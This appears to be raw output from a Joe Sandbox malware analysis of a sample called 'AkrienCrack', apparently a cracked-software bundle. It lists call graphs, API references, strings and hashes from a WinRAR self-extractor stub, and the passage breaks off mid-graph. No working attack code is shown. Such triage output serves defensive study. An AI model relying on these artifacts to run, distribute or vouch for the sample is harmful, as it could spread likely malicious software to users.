b49989 GetFileType 24669->24671 24670->24652 24672 b49887 24671->24672 24673 b498b7 24672->24673 24674 b498a8 GetLastError 24672->24674 24675 b49895 24672->24675 24673->24670 24677 b498c7 GetLastError 24673->24677 24674->24670 24674->24673 24676 b4984e GetFileType 24675->24676 24676->24670 24677->24670 24677->24675 24678->24649 24680 b67430 ___FrameUnwindToState 24679->24680 24681 b67448 24680->24681 24682 b6757e _abort GetModuleHandleW 24680->24682 24701 b6a3f1 EnterCriticalSection 24681->24701 24684 b6743c 24682->24684 24684->24681 24713 b675c2 GetModuleHandleExW 24684->24713 24687 b67450 24697 b674c5 24687->24697 24700 b674ee 24687->24700 24721 b67f30 20 API calls _abort 24687->24721 24689 b67537 24722 b71a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24689->24722 24690 b6750b 24705 b6753d 24690->24705 24694 b681f1 _abort 5 API calls 24699 b674dd 24694->24699 24695 b681f1 _abort 5 API calls 24695->24700 24697->24694 24697->24699 24699->24695 24702 b6752e 24700->24702 24701->24687 24723 b6a441 LeaveCriticalSection 24702->24723 24704 b67507 24704->24689 24704->24690 24724 b6a836 24705->24724 24708 b6756b 24711 b675c2 _abort 8 API calls 24708->24711 24709 b6754b GetPEB 24709->24708 24710 b6755b GetCurrentProcess TerminateProcess 24709->24710 24710->24708 24712 b67573 ExitProcess 24711->24712 24714 b6760f 24713->24714 24715 b675ec GetProcAddress 24713->24715 24717 b67615 FreeLibrary 24714->24717 24718 b6761e 24714->24718 24716 b67601 24715->24716 24716->24714 24717->24718 24719 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24718->24719 24720 b67628 24719->24720 24720->24681 24721->24697 24723->24704 24725 b6a85b 24724->24725 24729 b6a851 24724->24729 24726 b6a458 __dosmaperr 5 API calls 24725->24726 24726->24729 24727 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24728 b67547 24727->24728 24728->24708 24728->24709 24729->24727 24778 b5eac0 27 API calls pre_c_initialization 24825 b597c0 10 API calls 24780 b69ec0 21 API calls 24826 b6b5c0 GetCommandLineA GetCommandLineW 24781 b5a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24827 b6ebc1 21 API calls __vsnwprintf_l 24830 b5be49 103 API calls 4 library calls 24782 b5a430 73 API calls 24783 b41025 29 API calls pre_c_initialization 24836 b61522 RaiseException 23104 b49f2f 23105 b49f44 23104->23105 23106 b49f3d 23104->23106 23107 b49f4a GetStdHandle 23105->23107 23111 b49f55 23105->23111 23107->23111 23108 b49fa9 WriteFile 23108->23111 23109 b49f7c WriteFile 23110 b49f7a 23109->23110 23109->23111 23110->23109 23110->23111 23111->23106 23111->23108 23111->23109 23111->23110 23113 b4a031 23111->23113 23115 b46e18 60 API calls 23111->23115 23116 b47061 75 API calls 23113->23116 23115->23111 23116->23106 24839 b46110 80 API calls 24840 b6b710 GetProcessHeap 24841 b5be49 108 API calls 4 library calls 24842 b41f05 126 API calls __EH_prolog 23196 b5db01 23197 b5daaa 23196->23197 23198 b5df59 ___delayLoadHelper2@8 19 API calls 23197->23198 23198->23197 24784 b5ea00 46 API calls 5 library calls 23201 b5c40e 23202 b5c4c7 23201->23202 23209 b5c42c _wcschr 23201->23209 23203 b5c4e5 23202->23203 23219 b5be49 _wcsrchr 23202->23219 23256 b5ce22 23202->23256 23206 b5ce22 18 API calls 23203->23206 23203->23219 23206->23219 23207 b5ca8d 23209->23202 23210 b517ac CompareStringW 23209->23210 23210->23209 23211 b5c11d SetWindowTextW 23211->23219 23216 b5bf0b SetFileAttributesW 23218 b5bfc5 GetFileAttributesW 23216->23218 23229 b5bf25 ___scrt_get_show_window_mode 23216->23229 23218->23219 23221 b5bfd7 DeleteFileW 23218->23221 23219->23207 23219->23211 23219->23216 23222 b5c2e7 GetDlgItem SetWindowTextW SendMessageW 23219->23222 23225 b5c327 SendMessageW 23219->23225 23230 b517ac CompareStringW 23219->23230 23231 b5aa36 23219->23231 23235 b59da4 GetCurrentDirectoryW 23219->23235 23240 b4a52a 7 API calls 23219->23240 23241 b4a4b3 FindClose 23219->23241 23242 b5ab9a 76 API calls new 23219->23242 23243 b635de 23219->23243 23221->23219 23223 b5bfe8 23221->23223 23222->23219 23237 b4400a 23223->23237 23225->23219 23227 b5c01d MoveFileW 23227->23219 23228 b5c035 MoveFileExW 23227->23228 23228->23219 23229->23218 23229->23219 23236 b4b4f7 52 API calls 2 library calls 23229->23236 23230->23219 23232 b5aa40 23231->23232 23233 b5ab16 23232->23233 23234 b5aaf3 ExpandEnvironmentStringsW 23232->23234 23233->23219 23234->23233 23235->23219 23236->23229 23279 b43fdd 23237->23279 23240->23219 23241->23219 23242->23219 23244 b68606 23243->23244 23245 b68613 23244->23245 23246 b6861e 23244->23246 23247 b68518 __vsnwprintf_l 21 API calls 23245->23247 23248 b68626 23246->23248 23254 b6862f __dosmaperr 23246->23254 23253 b6861b 23247->23253 23249 b684de _free 20 API calls 23248->23249 23249->23253 23250 b68634 23308 b6895a 20 API calls __dosmaperr 23250->23308 23251 b68659 HeapReAlloc 23251->23253 23251->23254 23253->23219 23254->23250 23254->23251 23309 b671ad 7 API calls 2 library calls 23254->23309 23257 b5ce2c ___scrt_get_show_window_mode 23256->23257 23258 b5cf1b 23257->23258 23264 b5d08a 23257->23264 23313 b517ac CompareStringW 23257->23313 23310 b4a180 23258->23310 23262 b5cf4f ShellExecuteExW 23262->23264 23270 b5cf62 23262->23270 23264->23203 23265 b5cf47 23265->23262 23266 b5cf9b 23315 b5d2e6 6 API calls 23266->23315 23267 b5cff1 CloseHandle 23268 b5cfff 23267->23268 23269 b5d00a 23267->23269 23316 b517ac CompareStringW 23268->23316 23269->23264 23275 b5d081 ShowWindow 23269->23275 23270->23266 23270->23267 23272 b5cf91 ShowWindow 23270->23272 23272->23266 23274 b5cfb3 23274->23267 23276 b5cfc6 GetExitCodeProcess 23274->23276 23275->23264 23276->23267 23277 b5cfd9 23276->23277 23277->23267 23280 b43ff4 __vswprintf_c_l 23279->23280 23283 b65759 23280->23283 23286 b63837 23283->23286 23287 b63877 23286->23287 23288 b6385f 23286->23288 23287->23288 23290 b6387f 23287->23290 23303 b6895a 20 API calls __dosmaperr 23288->23303 23292 b63dd6 __cftof 38 API calls 23290->23292 23291 b63864 23304 b68839 26 API calls ___std_exception_copy 23291->23304 23294 b6388f 23292->23294 23305 b63da1 20 API calls 2 library calls 23294->23305 23296 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23298 b43ffe GetFileAttributesW 23296->23298 23297 b63907 23306 b64186 51 API calls 3 library calls 23297->23306 23298->23223 23298->23227 23301 b6386f 23301->23296 23302 b63912 23307 b63e59 20 API calls _free 23302->23307 23303->23291 23304->23301 23305->23297 23306->23302 23307->23301 23308->23253 23309->23254 23317 b4a194 23310->23317 23313->23258 23314 b4b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23314->23265 23315->23274 23316->23269 23325 b5e360 23317->23325 23320 b4a1b2 23327 b4b66c 23320->23327 23321 b4a189 23321->23262 23321->23314 23323 b4a1c6 23323->23321 23324 b4a1ca GetFileAttributesW 23323->23324 23324->23321 23326 b4a1a1 GetFileAttributesW 23325->23326 23326->23320 23326->23321 23328 b4b679 23327->23328 23336 b4b683 23328->23336 23337 b4b806 CharUpperW 23328->23337 23330 b4b692 23338 b4b832 CharUpperW 23330->23338 23332 b4b6a1 23333 b4b6a5 23332->23333 23334 b4b71c GetCurrentDirectoryW 23332->23334 23339 b4b806 CharUpperW 23333->23339 23334->23336 23336->23323 23337->23330 23338->23332 23339->23336 24785 b5ec0b 28 API calls 2 library calls 24844 b5db0b 19 API calls ___delayLoadHelper2@8 24786 b41075 82 API calls pre_c_initialization 24787 b55c77 121 API calls __vswprintf_c_l 23342 b5d573 23343 b5d580 23342->23343 23350 b4ddd1 23343->23350 23346 b4400a _swprintf 51 API calls 23347 b5d5a6 SetDlgItemTextW 23346->23347 23353 b5ac74 PeekMessageW 23347->23353 23358 b4ddff 23350->23358 23354 b5ac8f GetMessageW 23353->23354 23355 b5acc8 23353->23355 23356 b5aca5 IsDialogMessageW 23354->23356 23357 b5acb4 TranslateMessage DispatchMessageW 23354->23357 23356->23355 23356->23357 23357->23355 23364 b4d28a 23358->23364 23361 b4de22 LoadStringW 23362 b4ddfc 23361->23362 23363 b4de39 LoadStringW 23361->23363 23362->23346 23363->23362 23369 b4d1c3 23364->23369 23366 b4d2a7 23367 b4d2bc 23366->23367 23377 b4d2c8 26 API calls 23366->23377 23367->23361 23367->23362 23370 b4d1d7 _strncpy 23369->23370 23371 b4d1de 23369->23371 23370->23366 23373 b4d202 23371->23373 23378 b51596 WideCharToMultiByte 23371->23378 23376 b4d233 23373->23376 23379 b4dd6b 50 API calls __vsnprintf 23373->23379 23380 b658d9 26 API calls 3 library calls 23376->23380 23377->23367 23378->23373 23379->23376 23380->23370 24791 b5fc60 51 API calls 2 library calls 24793 b63460 RtlUnwind 24794 b69c60 71 API calls _free 24795 b69e60 31 API calls 2 library calls 24846 b59b50 GdipDisposeImage GdipFree pre_c_initialization 24799 b68050 8 API calls ___vcrt_uninitialize 24730 b5dc5d 24731 b5dc2e 24730->24731 24731->24730 24732 b5df59 ___delayLoadHelper2@8 19 API calls 24731->24732 24732->24731 24737 b49b59 24740 b49bd7 24737->24740 24741 b49b63 24737->24741 24738 b49bad SetFilePointer 24739 b49bcd GetLastError 24738->24739 24738->24740 24739->24740 24741->24738 24848 b5be49 98 API calls 3 library calls 24801 b5ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24802 b58c40 GetClientRect 24803 b63040 5 API calls 2 library calls 24804 b70040 IsProcessorFeaturePresent 24849 b5d34e DialogBoxParamW

              Control-flow Graph

              APIs
                • Part of subcall function 00B500CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00B500E4
                • Part of subcall function 00B500CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B500F6
                • Part of subcall function 00B500CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B50127
                • Part of subcall function 00B59DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B59DAC
                • Part of subcall function 00B5A335: OleInitialize.OLE32(00000000), ref: 00B5A34E
                • Part of subcall function 00B5A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5A385
                • Part of subcall function 00B5A335: SHGetMalloc.SHELL32(00B88430), ref: 00B5A38F
                • Part of subcall function 00B513B3: GetCPInfo.KERNEL32(00000000,?), ref: 00B513C4
                • Part of subcall function 00B513B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00B513D8
              • GetCommandLineW.KERNEL32 ref: 00B5D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B5D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B5D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00B5D68E
                • Part of subcall function 00B5D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5D29D
                • Part of subcall function 00B5D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B5D2D9
              • CloseHandle.KERNEL32(00000000), ref: 00B5D697
              • GetModuleFileNameW.KERNEL32(00000000,00B9DC90,00000800), ref: 00B5D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,00B9DC90), ref: 00B5D6BE
              • GetLocalTime.KERNEL32(?), ref: 00B5D6C9
              • _swprintf.LIBCMT ref: 00B5D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B5D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 00B5D721
              • LoadIconW.USER32(00000000,00000064), ref: 00B5D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00B5D789
              • Sleep.KERNEL32(?), ref: 00B5D7B7
              • DeleteObject.GDI32 ref: 00B5D7F0
              • DeleteObject.GDI32(?), ref: 00B5D800
              • CloseHandle.KERNEL32 ref: 00B5D843
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-2070194233
              • Opcode ID: 88ebc35d6c3b1d62e7c6473b047ca449f1e9063f6efd6424f25aec12f84225a3
              • Instruction ID: ec5e3f732fa32357cb629f10a2741b4f87787df4af8f69618d6b6205920d3d96
              • Opcode Fuzzy Hash: 88ebc35d6c3b1d62e7c6473b047ca449f1e9063f6efd6424f25aec12f84225a3
              • Instruction Fuzzy Hash: EE61B471900241AFD730AF65EC4AF2A37E8EB49742F4405E9F949A32B1DF74C948C762

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 971 b4a5f4-b4a61f call b5e360 974 b4a691-b4a69a FindNextFileW 971->974 975 b4a621-b4a632 FindFirstFileW 971->975 976 b4a6b0-b4a6b2 974->976 977 b4a69c-b4a6aa GetLastError 974->977 978 b4a6b8-b4a75c call b4fe56 call b4bcfb call b50e19 * 3 975->978 979 b4a638-b4a64f call b4b66c 975->979 976->978 980 b4a761-b4a774 976->980 977->976 978->980 986 b4a651-b4a668 FindFirstFileW 979->986 987 b4a66a-b4a673 GetLastError 979->987 986->978 986->987 989 b4a684 987->989 990 b4a675-b4a678 987->990 993 b4a686-b4a68c 989->993 990->989 992 b4a67a-b4a67d 990->992 992->989 995 b4a67f-b4a682 992->995 993->980 995->993
              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A692
              • GetLastError.KERNEL32(?,?,?,?,00B4A4EF,000000FF,?,?), ref: 00B4A69E
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: 033ab577b5782769f3d12c913d544421b1636acfabfd220707ccfbbc1db962bb
              • Instruction ID: 3355aab5916b45597df205c2fa67b2a9f97d472b9a58177982bdb5cdf36f22a8
              • Opcode Fuzzy Hash: 033ab577b5782769f3d12c913d544421b1636acfabfd220707ccfbbc1db962bb
              • Instruction Fuzzy Hash: 22417472505241AFC724EF68C8C4ADAF7E8FF48350F050A6DF999D3240D734AA949B92
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002,00000000), ref: 00B6755E
              • TerminateProcess.KERNEL32(00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002,00000000), ref: 00B67565
              • ExitProcess.KERNEL32 ref: 00B67577
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: e03a39224713e99efeea71b3b3aca892d118c71a651d60a15e2b6673f7137c19
              • Instruction ID: f8c060bd418ac086d97db60cff76480550274491dee48c06198ae94be79ea579
              • Opcode Fuzzy Hash: e03a39224713e99efeea71b3b3aca892d118c71a651d60a15e2b6673f7137c19
              • Instruction Fuzzy Hash: F2E0B631054548EBCF11FF64DD19A493BA9EB50B45F1084A4F94A9B232CF39DE82DB50
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: 349c11b90499d62f9d5fd2ad1f0763f9f1d767f2227b79c19fb0b0066e1ce747
              • Instruction ID: 913be2ed8e7535c69a9c196a843805651b72f12bf14eb934d5edf221b10c2ba1
              • Opcode Fuzzy Hash: 349c11b90499d62f9d5fd2ad1f0763f9f1d767f2227b79c19fb0b0066e1ce747
              • Instruction Fuzzy Hash: 7A820870904245AEDF25DB64C895BFEBBF9EF05300F0841FAE959AB142DB315B48EB60
              APIs
              • __EH_prolog.LIBCMT ref: 00B5AEE5
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-3513413516
              • Opcode ID: 92933aea0f6c87c8d9de117696db608e1a2b5224ef5ea858fe06e56b93439e1b
              • Instruction ID: 32ac6c6c4111150e2604e9328f23d404c4a974fa3cfc16bf8940d4297a33b150
              • Opcode Fuzzy Hash: 92933aea0f6c87c8d9de117696db608e1a2b5224ef5ea858fe06e56b93439e1b
              • Instruction Fuzzy Hash: AE42B271944244AFEB21ABA49C8AFAE7BFCEB05702F4401D5FA05B71E1CF744A48DB61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 257 b500cf-b500ee call b5e360 GetModuleHandleW 260 b50154-b503b2 257->260 261 b500f0-b50107 GetProcAddress 257->261 264 b50484-b504b3 GetModuleFileNameW call b4bc85 call b4fe56 260->264 265 b503b8-b503c3 call b670dd 260->265 262 b50121-b50131 GetProcAddress 261->262 263 b50109-b5011f 261->263 262->260 267 b50133-b50152 262->267 263->262 278 b504b5-b504bf call b4acf5 264->278 265->264 273 b503c9-b503fa GetModuleFileNameW CreateFileW 265->273 267->260 276 b503fc-b5040a SetFilePointer 273->276 277 b50478-b5047f CloseHandle 273->277 276->277 279 b5040c-b50429 ReadFile 276->279 277->264 285 b504c1-b504c5 call b50085 278->285 286 b504cc 278->286 279->277 282 b5042b-b50450 279->282 284 b5046d-b50476 call b4fbd8 282->284 284->277 294 b50452-b5046c call b50085 284->294 291 b504ca 285->291 289 b504ce-b504d0 286->289 292 b504f2-b50518 call b4bcfb GetFileAttributesW 289->292 293 b504d2-b504f0 CompareStringW 289->293 291->289 296 b5051a-b5051e 292->296 302 b50522 292->302 293->292 293->296 294->284 296->278 300 b50520 296->300 301 b50526-b50528 300->301 303 b50560-b50562 301->303 304 b5052a 301->304 302->301 306 b5066f-b50679 303->306 307 b50568-b5057f call b4bccf call b4acf5 303->307 305 b5052c-b50552 call b4bcfb GetFileAttributesW 304->305 312 b50554-b50558 305->312 313 b5055c 305->313 317 b505e7-b5061a call b4400a AllocConsole 307->317 318 b50581-b505e2 call b50085 * 2 call b4ddd1 call b4400a call b4ddd1 call b59f35 307->318 312->305 315 b5055a 312->315 313->303 315->303 324 b50667-b50669 ExitProcess 317->324 325 b5061c-b50661 GetCurrentProcessId AttachConsole call b635b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->325 318->324 325->324
              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 00B500E4
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B500F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B50127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B503D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B503F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B50402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00B73BA4,00000000), ref: 00B50421
              • CloseHandle.KERNEL32(00000000), ref: 00B50479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B5048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00B504E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00B50510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00B5054A
                • Part of subcall function 00B50085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
                • Part of subcall function 00B50085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              • _swprintf.LIBCMT ref: 00B505BE
              • _swprintf.LIBCMT ref: 00B5060A
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • AllocConsole.KERNEL32 ref: 00B50612
              • GetCurrentProcessId.KERNEL32 ref: 00B5061C
              • AttachConsole.KERNEL32(00000000), ref: 00B50623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B50649
              • WriteConsoleW.KERNEL32(00000000), ref: 00B50650
              • Sleep.KERNEL32(00002710), ref: 00B5065B
              • FreeConsole.KERNEL32 ref: 00B50661
              • ExitProcess.KERNEL32 ref: 00B50669
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: 31cfffa1694f609bf643fd4c161dd1961145940c09978a7b2c0136430931f82a
              • Instruction ID: c78fc8ec08d1fe522c7ef7b6bc005aeb14faf394e749a425cbb71295b9b48b2a
              • Opcode Fuzzy Hash: 31cfffa1694f609bf643fd4c161dd1961145940c09978a7b2c0136430931f82a
              • Instruction Fuzzy Hash: C6D185720083849BD331AF50D849B9FBBE8FF85B05F10899CF5AD97250DBB086489B63

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 406 b5bdf5-b5be0d call b5e28c call b5e360 411 b5ca90-b5ca9d 406->411 412 b5be13-b5be3d call b5aa36 406->412 412->411 415 b5be43-b5be48 412->415 416 b5be49-b5be57 415->416 417 b5be58-b5be6d call b5a6c7 416->417 420 b5be6f 417->420 421 b5be71-b5be86 call b517ac 420->421 424 b5be93-b5be96 421->424 425 b5be88-b5be8c 421->425 427 b5ca5c-b5ca87 call b5aa36 424->427 428 b5be9c 424->428 425->421 426 b5be8e 425->426 426->427 427->416 443 b5ca8d-b5ca8f 427->443 429 b5c115-b5c117 428->429 430 b5c074-b5c076 428->430 431 b5bea3-b5bea6 428->431 432 b5c132-b5c134 428->432 429->427 438 b5c11d-b5c12d SetWindowTextW 429->438 430->427 435 b5c07c-b5c088 430->435 431->427 436 b5beac-b5bf06 call b59da4 call b4b965 call b4a49d call b4a5d7 call b470bf 431->436 432->427 434 b5c13a-b5c141 432->434 434->427 439 b5c147-b5c160 434->439 440 b5c09c-b5c0a1 435->440 441 b5c08a-b5c09b call b67168 435->441 497 b5c045-b5c05a call b4a52a 436->497 438->427 444 b5c162 439->444 445 b5c168-b5c176 call b635b3 439->445 448 b5c0a3-b5c0a9 440->448 449 b5c0ab-b5c0b6 call b5ab9a 440->449 441->440 443->411 444->445 445->427 461 b5c17c-b5c185 445->461 453 b5c0bb-b5c0bd 448->453 449->453 458 b5c0bf-b5c0c6 call b635b3 453->458 459 b5c0c8-b5c0e8 call b635b3 call b635de 453->459 458->459 480 b5c101-b5c103 459->480 481 b5c0ea-b5c0f1 459->481 465 b5c187-b5c18b 461->465 466 b5c1ae-b5c1b1 461->466 465->466 470 b5c18d-b5c195 465->470 472 b5c1b7-b5c1ba 466->472 473 b5c296-b5c2a4 call b4fe56 466->473 470->427 476 b5c19b-b5c1a9 call b4fe56 470->476 478 b5c1c7-b5c1e2 472->478 479 b5c1bc-b5c1c1 472->479 489 